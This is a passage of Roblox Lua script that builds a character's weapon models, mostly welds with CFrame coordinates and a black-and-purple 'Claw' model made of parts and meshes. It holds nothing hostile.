  588. w7.C0 = CFrame.new(-67.5183792, -21.1694489, 74.0717163, 1, -3.97989206e-005, 1.13026372e-005, -4.09751265e-005, -0.91493088, 0.403610349, -5.72212457e-006, -0.403610349, -0.91493088)
  589. w7.Part1 = p8
  590. w7.C1 = CFrame.new(-67.508461, -23.234499, 73.7728119, 1, -3.97989206e-005, 1.13026372e-005, -4.09751265e-005, -0.91493088, 0.403610349, -5.72212457e-006, -0.403610349, -0.91493088)
  591. w8 = Instance.new("Weld", p8)
  592. w8.Name = "Part_Weld"
  593. w8.Part0 = p8
  594. w8.C0 = CFrame.new(-67.508461, -23.234499, 73.7728119, 1, -3.97989206e-005, 1.13026372e-005, -4.09751265e-005, -0.91493088, 0.403610349, -5.72212457e-006, -0.403610349, -0.91493088)
  595. w8.Part1 = p9
  596. w8.C1 = CFrame.new(-72.2151413, -19.6674671, -67.5124359, -2.77766703e-005, 0.353263557, 0.935524285, -1.84533783e-005, -0.935524285, 0.353263557, 1, -7.4510931e-006, 3.25046385e-005)
  597. w9 = Instance.new("Weld", p9)
  598. w9.Name = "Part_Weld"
  599. w9.Part0 = p9
  600. w9.C0 = CFrame.new(-72.2151413, -19.6674671, -67.5124359, -2.77766703e-005, 0.353263557, 0.935524285, -1.84533783e-005, -0.935524285, 0.353263557, 1, -7.4510931e-006, 3.25046385e-005)
  601. w9.Part1 = p10
  602. w9.C1 = CFrame.new(67.0792923, -29.5803547, -67.4901428, -2.24114753e-008, 0.292369425, -0.956305802, 3.04095332e-010, 0.956305802, 0.292369425, 1, 6.26159258e-009, -2.15211493e-008)
  603. w10 = Instance.new("Weld", p10)
  604. w10.Name = "Part_Weld"
  605. w10.Part0 = p10
  606. w10.C0 = CFrame.new(67.0792923, -29.5803547, -67.4901428, -2.24114753e-008, 0.292369425, -0.956305802, 3.04095332e-010, 0.956305802, 0.292369425, 1, 6.26159258e-009, -2.15211493e-008)
  607. w10.Part1 = p11
  608. w10.C1 = CFrame.new(-62.9921722, 32.1197624, -67.5121918, -2.88835581e-005, -0.362230271, 0.932088912, 9.3476192e-006, -0.932088912, -0.362230271, 1, -1.74967965e-006, 3.03080251e-005)
  609. w11 = Instance.new("Weld", p11)
  610. w11.Name = "Part_Weld"
  611. w11.Part0 = p11
  612. w11.C0 = CFrame.new(-62.9921722, 32.1197624, -67.5121918, -2.88835581e-005, -0.362230271, 0.932088912, 9.3476192e-006, -0.932088912, -0.362230271, 1, -1.74967965e-006, 3.03080251e-005)
  613. w11.Part1 = p12
  614. w11.C1 = CFrame.new(67.5028763, 72.2527161, 6.8300252, -1, -9.15522687e-005, -3.05189751e-005, 3.05161811e-005, 3.05189751e-005, -1, 9.15532e-005, -1, -3.05161811e-005)
  615. w12 = Instance.new("Weld", p12)
  616. w12.Name = "Part_Weld"
  617. w12.Part0 = p12
  618. w12.C0 = CFrame.new(67.5028763, 72.2527161, 6.8300252, -1, -9.15522687e-005, -3.05189751e-005, 3.05161811e-005, 3.05189751e-005, -1, 9.15532e-005, -1, -3.05161811e-005)
  619. w12.Part1 = p13
  620. w12.C1 = CFrame.new(-72.3439255, 18.054121, -67.5101624, -4.09776035e-008, -0.11906305, 0.992886722, 4.05430745e-010, -0.992886722, -0.11906305, 1, -4.47637571e-009, 4.0734399e-008)
  621. w13 = Instance.new("Weld", p13)
  622. w13.Name = "Part_Weld"
  623. w13.Part0 = p13
  624. w13.C0 = CFrame.new(-72.3439255, 18.054121, -67.5101624, -4.09776035e-008, -0.11906305, 0.992886722, 4.05430745e-010, -0.992886722, -0.11906305, 1, -4.47637571e-009, 4.0734399e-008)
  625. w13.Part1 = p14
  626. w13.C1 = CFrame.new(69.1140671, 24.5752277, -67.4901428, -2.4837334e-008, -0.462350011, -0.886697888, 5.64353009e-010, 0.886697888, -0.462350011, 1, -1.19839818e-008, -2.17623022e-008)
  627. w14 = Instance.new("Weld", p14)
  628. w14.Name = "Part_Weld"
  629. w14.Part0 = p14
  630. w14.C0 = CFrame.new(69.1140671, 24.5752277, -67.4901428, -2.4837334e-008, -0.462350011, -0.886697888, 5.64353009e-010, 0.886697888, -0.462350011, 1, -1.19839818e-008, -2.17623022e-008)
  631. w14.Part1 = p15
  632. w14.C1 = CFrame.new(47.9809418, -52.7511749, -67.5101318, -3.94735267e-008, 0.64509654, -0.764101744, -4.55740418e-010, 0.764101744, 0.64509654, 1, 2.58124242e-008, -2.98677882e-008)
  633. w15 = Instance.new("Weld", p15)
  634. w15.Name = "Part_Weld"
  635. w15.Part0 = p15
  636. w15.C0 = CFrame.new(47.9809418, -52.7511749, -67.5101318, -3.94735267e-008, 0.64509654, -0.764101744, -4.55740418e-010, 0.764101744, 0.64509654, 1, 2.58124242e-008, -2.98677882e-008)
  637. w15.Part1 = p16
  638. w15.C1 = CFrame.new(-75.3105469, -10.1974039, -67.5001221, -4.37113883e-008, 0.258818924, 0.965925872, 0, -0.965925872, 0.258818924, 1, 1.13133343e-008, 4.22219593e-008)
  639. w16 = Instance.new("Weld", p16)
  640. w16.Name = "Part_Weld"
  641. w16.Part0 = p16
  642. w16.C0 = CFrame.new(-75.3105469, -10.1974039, -67.5001221, -4.37113883e-008, 0.258818924, 0.965925872, 0, -0.965925872, 0.258818924, 1, 1.13133343e-008, 4.22219593e-008)
  643. w16.Part1 = p17
  644. w16.C1 = CFrame.new(64.0820847, -29.3829937, -67.5001373, -4.09009289e-008, 0.293349952, -0.956005633, 4.38312497e-010, 0.956005633, 0.293349952, 1, 1.15792238e-008, -3.92300876e-008)
  645. w17 = Instance.new("Weld", p17)
  646. w17.Name = "Wedge_Weld"
  647. w17.Part0 = p17
  648. w17.C0 = CFrame.new(64.0820847, -29.3829937, -67.5001373, -4.09009289e-008, 0.293349952, -0.956005633, 4.38312497e-010, 0.956005633, 0.293349952, 1, 1.15792238e-008, -3.92300876e-008)
  649. w17.Part1 = p18
  650. w17.C1 = CFrame.new(-67.4979324, 69.4871521, -6.82958078, 1, 3.05171125e-005, -3.05180438e-005, -3.05171125e-005, -3.05180438e-005, -1, -3.05180438e-005, 1, -3.05171125e-005)
  651. w18 = Instance.new("Weld", p18)
  652. w18.Name = "Wedge_Weld"
  653. w18.Part0 = p18
  654. w18.C0 = CFrame.new(-67.4979324, 69.4871521, -6.82958078, 1, 3.05171125e-005, -3.05180438e-005, -3.05171125e-005, -3.05180438e-005, -1, -3.05180438e-005, 1, -3.05171125e-005)
  655. w18.Part1 = p19
  656. w18.C1 = CFrame.new(67.4982986, -75.0367737, -6.83008671, -1, -9.15532e-005, 3.05161811e-005, 3.05189751e-005, -3.05161811e-005, 1, -9.15522687e-005, 1, 3.05189751e-005)
  657. w19 = Instance.new("Weld", p19)
  658. w19.Name = "Part_Weld"
  659. w19.Part0 = p19
  660. w19.C0 = CFrame.new(67.4982986, -75.0367737, -6.83008671, -1, -9.15532e-005, 3.05161811e-005, 3.05189751e-005, -3.05161811e-005, 1, -9.15522687e-005, 1, 3.05189751e-005)
  661. w19.Part1 = p20
  662. w19.C1 = CFrame.new(-16.3677292, -69.9670334, -67.5001678, -1.77821063e-010, 0.992886961, 0.119063012, -1.46926671e-009, -0.119063012, 0.992886961, 1, 1.59595731e-012, 1.47997492e-009)
  663. w20 = Instance.new("Weld", p20)
  664. w20.Name = "Part_Weld"
  665. w20.Part0 = p20
  666. w20.C0 = CFrame.new(-16.3677292, -69.9670334, -67.5001678, -1.77821063e-010, 0.992886961, 0.119063012, -1.46926671e-009, -0.119063012, 0.992886961, 1, 1.59595731e-012, 1.47997492e-009)
  667. w20.Part1 = p21
  668. w20.C1 = CFrame.new(-67.5104218, -38.2193756, 67.100563, 1, -4.10709617e-005, 9.00123541e-006, -3.82823673e-005, -0.800855637, 0.598857403, -1.73869594e-005, -0.598857403, -0.800855637)
  669. m.Parent = char
  670. m:MakeJoints()
  671. ----------------------------------------------------
  672. local cor = Instance.new("Part", char.Absolution)
  673. cor.Name = "Thingy"
  674. cor.Locked = true
  675. cor.BottomSurface = 0
  676. cor.CanCollide = false
  677. cor.Size = Vector3.new(1, 13, 1)
  678. cor.Transparency = 1
  679. cor.TopSurface = 0
  680. corw = Instance.new("Weld", cor)
  681. corw.Part0 = rarm
  682. corw.Part1 = cor
  683. corw.C0 = CFrame.new(0, -1, -1.1) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0))
  684. corw.C1 = CFrame.new(0, 0, 0)
  685. weld1 = Instance.new("Weld", char.Absolution)
  686. weld1.Part0 = cor
  687. weld1.Part1 = p6
  688. weld1.C0 = CFrame.new(0, 0, 0)
  689. ----------------------------------------------------
  690. hitb = Instance.new("Part", char.Absolution)
  691. hitb.Name = "Thingy2"
  692. hitb.Locked = true
  693. hitb.BottomSurface = 0
  694. hitb.CanCollide = false
  695. hitb.Size = Vector3.new(0, 8, 6)
  696. hitb.Transparency = 1
  697. hitb.TopSurface = 0
  698. weld2 = Instance.new("Weld", char.Absolution)
  699. weld2.Part0 = hitb
  700. weld2.Part1 = p12
  701. weld2.C0 = CFrame.new(0, .6, 1)
  702. ----------------------------------------------------
  703. local m = Instance.new("Model")
  704. m.Name = "Claw"
  705. p1 = Instance.new("Part", m)
  706. p1.BrickColor = BrickColor.new("Really black")
  707. p1.FormFactor = Enum.FormFactor.Custom
  708. p1.Size = Vector3.new(1.5, 0.5, 0.5)
  709. p1.CFrame = CFrame.new(2.91120553, 6.79703379, -19.5339718, -0.205515206, -0.209888965, 0.955883741, 0.52527827, -0.847774804, -0.0732159689, 0.825741529, 0.487057745, 0.284480691)
  710. p1.CanCollide = false
  711. p1.Locked = true
  712. p1.BottomSurface = Enum.SurfaceType.Smooth
  713. p1.TopSurface = Enum.SurfaceType.Smooth
  714. b1 = Instance.new("BlockMesh", p1)
  715. b1.Name = "Mesh"
  716. p2 = Instance.new("WedgePart", m)
  717. p2.BrickColor = BrickColor.new("Really black")
  718. p2.Name = "Wedge"
  719. p2.FormFactor = Enum.FormFactor.Custom
  720. p2.Size = Vector3.new(3, 1, 0.5)
  721. p2.CFrame = CFrame.new(2.94872427, 6.13246727, -16.5004997, -5.96046448e-008, -4.47034836e-008, -1.00000358, -1.3615936e-005, 0.99999994, 4.47034836e-008, 1.00000358, 1.41002238e-005, 0)
  722. p2.CanCollide = false
  723. p2.Locked = true
  724. p2.BottomSurface = Enum.SurfaceType.Smooth
  725. p2.TopSurface = Enum.SurfaceType.Smooth
  726. p3 = Instance.new("Part", m)
  727. p3.BrickColor = BrickColor.new("Really black")
  728. p3.FormFactor = Enum.FormFactor.Custom
  729. p3.Size = Vector3.new(1.5, 0.5, 0.5)
  730. p3.CFrame = CFrame.new(1.84869456, 6.79700661, -18.5422173, -5.06400113e-008, 1.07230136e-007, 1.00000715, -0.499905825, -0.866079628, -1.1125789e-007, 0.86608547, -0.499910295, -2.17476881e-008)
  731. p3.CanCollide = false
  732. p3.Locked = true
  733. p3.BottomSurface = Enum.SurfaceType.Smooth
  734. p3.TopSurface = Enum.SurfaceType.Smooth
  735. b2 = Instance.new("BlockMesh", p3)
  736. b2.Name = "Mesh"
  737. p4 = Instance.new("WedgePart", m)
  738. p4.BrickColor = BrickColor.new("Really black")
  739. p4.Name = "Wedge"
  740. p4.FormFactor = Enum.FormFactor.Custom
  741. p4.Size = Vector3.new(3, 1, 0.5)
  742. p4.CFrame = CFrame.new(0.0487272739, 4.13279819, -16.5004959, -1.62921424e-007, 1.78814929e-007, 1.00001431, -1.2755394e-005, -0.999999762, -1.78813849e-007, 1.00001431, -1.46627426e-005, -7.54998553e-008)
  743. p4.CanCollide = false
  744. p4.Locked = true
  745. p4.BottomSurface = Enum.SurfaceType.Smooth
  746. p4.TopSurface = Enum.SurfaceType.Smooth
  747. p5 = Instance.new("Part", m)
  748. p5.BrickColor = BrickColor.new("Really black")
  749. p5.FormFactor = Enum.FormFactor.Custom
  750. p5.Size = Vector3.new(1.5, 0.5, 0.5)
  751. p5.CFrame = CFrame.new(1.84874606, 6.79701567, -19.6422844, -4.29027068e-007, 1.9046513e-007, 1.00001431, 0.500089467, -0.865973532, 2.18601315e-008, 0.865987122, 0.50009501, 3.78533827e-008)
  752. p5.CanCollide = false
  753. p5.Locked = true
  754. p5.BottomSurface = Enum.SurfaceType.Smooth
  755. p5.TopSurface = Enum.SurfaceType.Smooth
  756. b3 = Instance.new("BlockMesh", p5)
  757. b3.Name = "Mesh"
  758. p6 = Instance.new("Part", m)
  759. p6.BrickColor = BrickColor.new("Really black")
  760. p6.FormFactor = Enum.FormFactor.Custom
  761. p6.Size = Vector3.new(1.5, 0.5, 0.5)
  762. p6.CFrame = CFrame.new(2.61122823, 6.79701757, -18.433939, -0.250001401, 0.0669622123, 0.965941966, -0.491382152, -0.868364573, -0.0669801831, 0.834303975, -0.491393685, 0.249996051)
  763. p6.CanCollide = false
  764. p6.Locked = true
  765. p6.BottomSurface = Enum.SurfaceType.Smooth
  766. p6.TopSurface = Enum.SurfaceType.Smooth
  767. b4 = Instance.new("BlockMesh", p6)
  768. b4.Name = "Mesh"
  769. p7 = Instance.new("Part", m)
  770. p7.BrickColor = BrickColor.new("Really black")
  771. p7.FormFactor = Enum.FormFactor.Custom
  772. p7.Size = Vector3.new(3, 1, 1.20000005)
  773. p7.CFrame = CFrame.new(2.59874034, 5.13276958, -16.5005379, -3.27825546e-007, -3.57627869e-007, -1.00001431, -0.000133868307, 0.99999994, 1.49011612e-008, 1.00001442, 0.000135900453, -5.96046448e-008)
  774. p7.CanCollide = false
  775. p7.Locked = true
  776. p7.BottomSurface = Enum.SurfaceType.Smooth
  777. p7.TopSurface = Enum.SurfaceType.Smooth
  778. b5 = Instance.new("BlockMesh", p7)
  779. b5.Name = "Mesh"
  780. p8 = Instance.new("Part", m)
  781. p8.BrickColor = BrickColor.new("Royal purple")
  782. p8.Material = "Neon"
  783. p8.FormFactor = Enum.FormFactor.Symmetric
  784. p8.Size = Vector3.new(1, 1, 1)
  785. p8.CFrame = CFrame.new(1.84841466, 6.25537968, -20.3997307, -1.42129729e-005, 0.00428489037, -1.00000513, 0.965967655, 0.258660465, 0.00109496934, 0.258668512, -0.965972245, -0.00414247159)
  786. p8.CanCollide = false
  787. p8.Locked = true
  788. b6 = Instance.new("SpecialMesh", p8)
  789. b6.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  790. b6.TextureId = ""
  791. b6.MeshType = Enum.MeshType.FileMesh
  792. b6.Name = "Mesh"
  793. b6.Scale = Vector3.new(1.20000005, 0.449999988, 0.449999988)
  794. p9 = Instance.new("Part", m)
  795. p9.BrickColor = BrickColor.new("Really black")
  796. p9.FormFactor = Enum.FormFactor.Custom
  797. p9.Size = Vector3.new(1.5, 0.5, 0.5)
  798. p9.CFrame = CFrame.new(2.79691935, 3.68131566, -18.264101, -0.277095288, -0.561500967, -0.779720128, 0.631033003, 0.505603611, -0.58835566, 0.724593103, -0.655058563, 0.214224264)
  799. p9.CanCollide = false
  800. p9.Locked = true
  801. p9.BottomSurface = Enum.SurfaceType.Smooth
  802. p9.TopSurface = Enum.SurfaceType.Smooth
  803. b7 = Instance.new("BlockMesh", p9)
  804. b7.Name = "Mesh"
  805. p10 = Instance.new("Part", m)
  806. p10.BrickColor = BrickColor.new("Royal purple")
  807. p10.Material = "Neon"
  808. p10.FormFactor = Enum.FormFactor.Symmetric
  809. p10.Size = Vector3.new(1, 1, 1)
  810. p10.CFrame = CFrame.new(3.09846497, 6.25236273, -20.2996788, -0.0669716895, 0.254178405, -0.964850724, 0.96595335, 0.258713901, 0.00110733509, 0.249903828, -0.93192625, -0.262850702)
  811. p10.CanCollide = false
  812. p10.Locked = true
  813. b8 = Instance.new("SpecialMesh", p10)
  814. b8.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  815. b8.TextureId = ""
  816. b8.MeshType = Enum.MeshType.FileMesh
  817. b8.Name = "Mesh"
  818. b8.Scale = Vector3.new(1.20000005, 0.449999988, 0.449999988)
  819. p11 = Instance.new("Part", m)
  820. p11.BrickColor = BrickColor.new("Really black")
  821. p11.FormFactor = Enum.FormFactor.Custom
  822. p11.Size = Vector3.new(1.5, 0.5, 0.5)
  823. p11.CFrame = CFrame.new(0.386122227, 6.79699421, -18.533905, 0.250022948, -0.0669473261, 0.965937555, -0.491377324, -0.868365645, 0.0670026764, 0.834300399, -0.491393894, -0.250007868)
  824. p11.CanCollide = false
  825. p11.Locked = true
  826. p11.BottomSurface = Enum.SurfaceType.Smooth
  827. p11.TopSurface = Enum.SurfaceType.Smooth
  828. b9 = Instance.new("BlockMesh", p11)
  829. b9.Name = "Mesh"
  830. p12 = Instance.new("Part", m)
  831. p12.BrickColor = BrickColor.new("Really black")
  832. p12.FormFactor = Enum.FormFactor.Custom
  833. p12.Size = Vector3.new(1.5, 0.5, 0.5)
  834. p12.CFrame = CFrame.new(1.14871967, 6.79700947, -19.6422291, -4.76837158e-007, 2.83122063e-007, 1.00001442, 0.500089884, -0.865973473, 4.47034836e-008, 0.865987122, 0.500095367, 1.49011612e-008)
  835. p12.CanCollide = false
  836. p12.Locked = true
  837. p12.BottomSurface = Enum.SurfaceType.Smooth
  838. p12.TopSurface = Enum.SurfaceType.Smooth
  839. b10 = Instance.new("BlockMesh", p12)
  840. b10.Name = "Mesh"
  841. p13 = Instance.new("Part", m)
  842. p13.BrickColor = BrickColor.new("Really black")
  843. p13.FormFactor = Enum.FormFactor.Custom
  844. p13.Size = Vector3.new(1.5, 0.5, 0.5)
  845. p13.CFrame = CFrame.new(1.14870512, 6.79699612, -18.5421638, -4.63888163e-008, 5.08347114e-007, 1.00001442, -0.499899268, -0.866083562, -2.18518963e-008, 0.866095126, -0.499908328, 3.78581007e-008)
  846. p13.CanCollide = false
  847. p13.Locked = true
  848. p13.BottomSurface = Enum.SurfaceType.Smooth
  849. p13.TopSurface = Enum.SurfaceType.Smooth
  850. b11 = Instance.new("BlockMesh", p13)
  851. b11.Name = "Mesh"
  852. p14 = Instance.new("Part", m)
  853. p14.BrickColor = BrickColor.new("Royal purple")
  854. p14.Material = "Neon"
  855. p14.FormFactor = Enum.FormFactor.Symmetric
  856. p14.Size = Vector3.new(1, 1, 1)
  857. p14.CFrame = CFrame.new(1.14845455, 6.25537348, -20.3996773, -1.42545232e-005, 0.00425684778, -1.00000536, 0.965958476, 0.258694947, 0.00108788908, 0.258703023, -0.965963125, -0.00411536777)
  858. p14.CanCollide = false
  859. p14.Locked = true
  860. b12 = Instance.new("SpecialMesh", p14)
  861. b12.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  862. b12.TextureId = ""
  863. b12.MeshType = Enum.MeshType.FileMesh
  864. b12.Name = "Mesh"
  865. b12.Scale = Vector3.new(1.20000005, 0.449999988, 0.449999988)
  866. p15 = Instance.new("Part", m)
  867. p15.BrickColor = BrickColor.new("Royal purple")
  868. p15.Transparency = 1
  869. p15.Name = "ArmPart"
  870. p15.FormFactor = Enum.FormFactor.Custom
  871. p15.Size = Vector3.new(2, 1, 1)
  872. p15.CFrame = CFrame.new(1.49875152, 5.13257265, -16.0004654, -2.99420208e-007, 4.39002179e-007, 1.00001442, 0.00011029192, -1, 0, 1.00001454, 0.000108176115, 4.42378223e-008)
  873. p15.CanCollide = false
  874. p15.Locked = true
  875. p15.BottomSurface = Enum.SurfaceType.Smooth
  876. p15.TopSurface = Enum.SurfaceType.Smooth
  877. b13 = Instance.new("BlockMesh", p15)
  878. b13.Name = "Mesh"
  879. p16 = Instance.new("Part", m)
  880. p16.BrickColor = BrickColor.new("Really black")
  881. p16.FormFactor = Enum.FormFactor.Custom
  882. p16.Size = Vector3.new(3, 1, 2.4000001)
  883. p16.CFrame = CFrame.new(1.49872661, 6.13250732, -16.5007095, -2.98894406e-007, 4.39006953e-007, 1.00001442, 0.000110270419, -1, 4.71678729e-012, 1.00001454, 0.000108154614, 4.37120207e-008)
  884. p16.CanCollide = false
  885. p16.Locked = true
  886. p16.BottomSurface = Enum.SurfaceType.Smooth
  887. p16.TopSurface = Enum.SurfaceType.Smooth
  888. b14 = Instance.new("BlockMesh", p16)
  889. b14.Name = "Mesh"
  890. p17 = Instance.new("Part", m)
  891. p17.BrickColor = BrickColor.new("Really black")
  892. p17.FormFactor = Enum.FormFactor.Custom
  893. p17.Size = Vector3.new(1.5, 0.5, 0.5)
  894. p17.CFrame = CFrame.new(2.77308726, 3.37837577, -19.2558823, 0.396035522, -0.497440547, -0.771840453, -0.207958207, 0.770127177, -0.603040278, 0.894391596, 0.399337679, 0.201549783)
  895. p17.CanCollide = false
  896. p17.Locked = true
  897. p17.BottomSurface = Enum.SurfaceType.Smooth
  898. p17.TopSurface = Enum.SurfaceType.Smooth
  899. b15 = Instance.new("BlockMesh", p17)
  900. b15.Name = "Mesh"
  901. p18 = Instance.new("Part", m)
  902. p18.BrickColor = BrickColor.new("Royal purple")
  903. p18.Material = "Neon"
  904. p18.FormFactor = Enum.FormFactor.Symmetric
  905. p18.Size = Vector3.new(1, 1, 1)
  906. p18.CFrame = CFrame.new(-0.0516102314, 6.25535488, -20.1996384, 0.066943109, -0.245838761, -0.967011333, 0.965954781, 0.258709013, 0.00110003352, 0.249906152, -0.934162259, 0.254788101)
  907. p18.CanCollide = false
  908. p18.Locked = true
  909. b16 = Instance.new("SpecialMesh", p18)
  910. b16.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  911. b16.TextureId = ""
  912. b16.MeshType = Enum.MeshType.FileMesh
  913. b16.Name = "Mesh"
  914. b16.Scale = Vector3.new(1.20000005, 0.449999988, 0.449999988)
  915. p19 = Instance.new("Part", m)
  916. p19.BrickColor = BrickColor.new("Royal purple")
  917. p19.Material = "Neon"
  918. p19.FormFactor = Enum.FormFactor.Symmetric
  919. p19.Size = Vector3.new(1, 1, 1)
  920. p19.CFrame = CFrame.new(2.43177533, 3.59484506, -20.0301056, 0.559401393, 0.116905749, 0.820629179, -0.685213447, -0.491872638, 0.537163019, 0.466440916, -0.862796843, -0.195047855)
  921. p19.CanCollide = false
  922. p19.Locked = true
  923. b17 = Instance.new("SpecialMesh", p19)
  924. b17.MeshId = "http://www.roblox.com/Asset/?id=9756362"
  925. b17.TextureId = ""
  926. b17.MeshType = Enum.MeshType.FileMesh
  927. b17.Name = "Mesh"
  928. b17.Scale = Vector3.new(1.20000005, 0.449999988, 0.449999988)
  929. p20 = Instance.new("Part", m)
  930. p20.BrickColor = BrickColor.new("Really black")
  931. p20.FormFactor = Enum.FormFactor.Custom
  932. p20.Size = Vector3.new(3, 1, 2.4000001)
  933. p20.CFrame = CFrame.new(1.49873698, 4.13275099, -16.500618, -2.38418579e-007, -4.47034836e-007, -1.00001454, -0.000133797526, 1.00000024, -2.98023224e-008, 1.00001466, 0.000135831535, -5.96046448e-008)
  934. p20.CanCollide = false
  935. p20.Locked = true
  936. p20.BottomSurface = Enum.SurfaceType.Smooth
  937. p20.TopSurface = Enum.SurfaceType.Smooth
  938. b18 = Instance.new("BlockMesh", p20)
  939. b18.Name = "Mesh"
  940. p21 = Instance.new("Part", m)
  941. p21.BrickColor = BrickColor.new("Really black")
  942. p21.FormFactor = Enum.FormFactor.Custom
  943. p21.Size = Vector3.new(3, 1, 1.19999993)
  944. p21.CFrame = CFrame.new(0.398718834, 5.13273239, -16.5005798, -2.22529991e-007, -4.17224015e-007, -1.00001454, -0.000133820766, 1.00000024, 5.9472427e-012, 1.00001466, 0.000135854774, -4.37120207e-008)
  945. p21.CanCollide = false
  946. p21.Locked = true
  947. p21.BottomSurface = Enum.SurfaceType.Smooth
  948. p21.TopSurface = Enum.SurfaceType.Smooth
  949. b19 = Instance.new("BlockMesh", p21)
  950. b19.Name = "Mesh"
  951. p22 = Instance.new("WedgePart", m)
  952. p22.BrickColor = BrickColor.new("Really black")
  953. p22.Name = "Wedge"
  954. p22.FormFactor = Enum.FormFactor.Custom
  955. p22.Size = Vector3.new(3, 1, 0.5)
  956. p22.CFrame = CFrame.new(2.94884443, 4.13282013, -16.5005474, 1.35156796e-007, 4.17202415e-007, -1.00001454, 1.19470278e-005, -1.00000024, -6.07483681e-013, -1.00001466, -1.39792755e-005, 4.37120278e-008)
  957. p22.CanCollide = false
  958. p22.Locked = true
  959. p22.BottomSurface = Enum.SurfaceType.Smooth
  960. p22.TopSurface = Enum.SurfaceType.Smooth
  961. p23 = Instance.new("Part", m)
  962. p23.BrickColor = BrickColor.new("Really black")
  963. p23.FormFactor = Enum.FormFactor.Custom
  964. p23.Size = Vector3.new(1.5, 0.5, 0.5)
  965. p23.CFrame = CFrame.new(0.111123323, 6.79699326, -19.53405, 0.167916089, 0.220654398, 0.960804224, 0.593452632, -0.800862908, 0.0802069977, 0.787171543, 0.556722164, -0.265425682)
  966. p23.CanCollide = false
  967. p23.Locked = true
  968. p23.BottomSurface = Enum.SurfaceType.Smooth
  969. p23.TopSurface = Enum.SurfaceType.Smooth
  970. b20 = Instance.new("BlockMesh", p23)
  971. b20.Name = "Mesh"
  972. p24 = Instance.new("WedgePart", m)
  973. p24.BrickColor = BrickColor.new("Really black")
  974. p24.Name = "Wedge"
  975. p24.FormFactor = Enum.FormFactor.Custom
  976. p24.Size = Vector3.new(3, 1, 0.5)
  977. p24.CFrame = CFrame.new(0.0487362742, 6.13243389, -16.5004158, -0.000165194273, -0.00030361861, 1.00001442, 0.00304524973, 0.999995589, 0.000303655863, -1.00001013, 0.00304720178, -0.000164449215)
  978. p24.CanCollide = false
  979. p24.Locked = true
  980. p24.BottomSurface = Enum.SurfaceType.Smooth
  981. p24.TopSurface = Enum.SurfaceType.Smooth
  982. p25 = Instance.new("Part", m)
  983. p25.BrickColor = BrickColor.new("Royal purple")
  984. p25.Material = "Neon"
  985. p25.FormFactor = Enum.FormFactor.Symmetric
  986. p25.Size = Vector3.new(1, 1, 1)
  987. p25.CFrame = CFrame.new(1.49870086, 5.13261318, -18.0007782, 1.20991026e-005, -1.00001454, -4.94604174e-005, -1.00000024, -1.16155716e-005, -0.000471511274, 0.000469659513, 4.96469293e-005, -1.00001466)
  988. p25.CanCollide = false
  989. p25.Locked = true
  990. p25.BottomSurface = Enum.SurfaceType.Smooth
  991. p25.TopSurface = Enum.SurfaceType.Smooth
  992. b21 = Instance.new("SpecialMesh", p25)
  993. b21.MeshId = "http://www.roblox.com/asset/?id=3270017"
  994. b21.TextureId = ""
  995. b21.MeshType = Enum.MeshType.FileMesh
  996. b21.Name = "Mesh"
  997. b21.Scale = Vector3.new(1.39999998, 1.39999998, 0.600000024)
  998. p26 = Instance.new("Part", m)
  999. p26.BrickColor = BrickColor.new("Really black")
  1000. p26.FormFactor = Enum.FormFactor.Symmetric
  1001. p26.Size = Vector3.new(1, 1, 1)
  1002. p26.CFrame = CFrame.new(1.49868095, 5.13287783, -17.5005093, 0.00030383491, 0.000164763711, -1.00001454, -0.999995768, -0.00302907336, -0.000303868263, -0.00303102471, 1.00001025, 0.000164022902)
  1003. p26.CanCollide = false
  1004. p26.Locked = true
  1005. p26.BottomSurface = Enum.SurfaceType.Smooth
  1006. p26.TopSurface = Enum.SurfaceType.Smooth
  1007. b22 = Instance.new("SpecialMesh", p26)
  1008. b22.MeshType = Enum.MeshType.Brick
  1009. b22.Name = "Mesh"
  1010. w1 = Instance.new("Weld", p1)
  1011. w1.Name = "Wedge_Weld"
  1012. w1.Part0 = p1
  1013. w1.C0 = CFrame.new(13.1579618, 15.8875484, 3.27191186, -0.205515206, 0.52527827, 0.825741529, -0.209888965, -0.847774804, 0.487057745, 0.955883741, -0.0732159689, 0.284480691)
  1014. w1.Part1 = p2
  1015. w1.C1 = CFrame.new(16.5005817, -6.13223743, 2.94872212, -4.37113883e-008, -1.38580826e-005, 1, 0, 1, 1.38580826e-005, -1, 6.05756005e-013, -4.37113883e-008)
  1016. w2 = Instance.new("Weld", p2)
  1017. w2.Name = "Part_Weld"
  1018. w2.Part0 = p2
  1019. w2.C0 = CFrame.new(16.5006275, -6.13223362, 2.94873357, -5.96046448e-008, -1.3615936e-005, 1.00000358, -4.47034836e-008, 0.99999994, 1.41002238e-005, -1.00000358, 4.47034836e-008, 0)
  1020. w2.Part1 = p3
  1021. w2.C1 = CFrame.new(19.4568748, -3.38260746, -1.84870064, -4.37113883e-008, -0.499906301, 0.866079509, 0, -0.866079509, -0.499906301, 1, -2.18515979e-008, 3.78575393e-008)
  1022. w3 = Instance.new("Weld", p3)
  1023. w3.Name = "Wedge_Weld"
  1024. w3.Part0 = p3
  1025. w3.C0 = CFrame.new(19.456995, -3.38268948, -1.84870648, -5.06400113e-008, -0.499905825, 0.86608547, 1.07230136e-007, -0.866079628, -0.499910295, 1.00000715, -1.1125789e-007, -2.17476881e-008)
  1026. w3.Part1 = p4
  1027. w3.C1 = CFrame.new(16.5005646, 4.13256884, -0.0487511083, -4.37113883e-008, -1.37408551e-005, 1, 0, -1, -1.37408551e-005, 1, -6.00631849e-013, 4.37113883e-008)
  1028. w4 = Instance.new("Weld", p4)
  1029. w4.Name = "Part_Weld"
  1030. w4.Part0 = p4
  1031. w4.C0 = CFrame.new(16.5007706, 4.13255453, -0.0487275235, -1.62921424e-007, -1.2755394e-005, 1.00001431, 1.78814929e-007, -0.999999762, -1.46627426e-005, 1.00001431, -1.78813849e-007, -7.54998553e-008)
  1032. w4.Part1 = p5
  1033. w4.C1 = CFrame.new(13.6104183, 15.7089605, -1.84869325, -4.37113883e-008, 0.500093758, 0.865971267, 0, -0.865971267, 0.500093758, 1, 2.18597922e-008, 3.78528071e-008)
  1034. w5 = Instance.new("Weld", p5)
  1035. w5.Name = "Part_Weld"
  1036. w5.Part0 = p5
